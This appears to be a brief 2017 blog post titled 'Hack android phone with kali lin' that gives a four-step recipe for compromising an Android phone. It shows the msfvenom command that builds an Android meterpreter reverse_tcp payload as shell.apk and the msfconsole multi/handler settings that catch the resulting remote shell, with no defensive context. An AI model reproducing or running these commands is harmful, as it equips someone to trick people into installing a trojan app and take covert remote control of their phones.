美文网首页
Hack android phone with kali lin

Hack android phone with kali lin

作者: burglar | 来源:发表于2017-02-23 15:20 被阅读0次

1 ifconfig

type
$ ifconfig
to get ip address,example 192.168.0.113

2 msfvenom

type
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.113 LPORT=4444 R > shell.apk
to generate the shell.apk

3 msfconsole

type

$ msfconsole
$ use exploit/multi/handler
$set payload android/meterpreter/reverse_tcp
$set LHOST 192.168.0.113
$set LPORT 4444

4 exploit

type
exploit
and all is done.

相关文章

网友评论

      本文标题:Hack android phone with kali lin

      本文链接:https://www.haomeiwen.com/subject/rygmwttx.html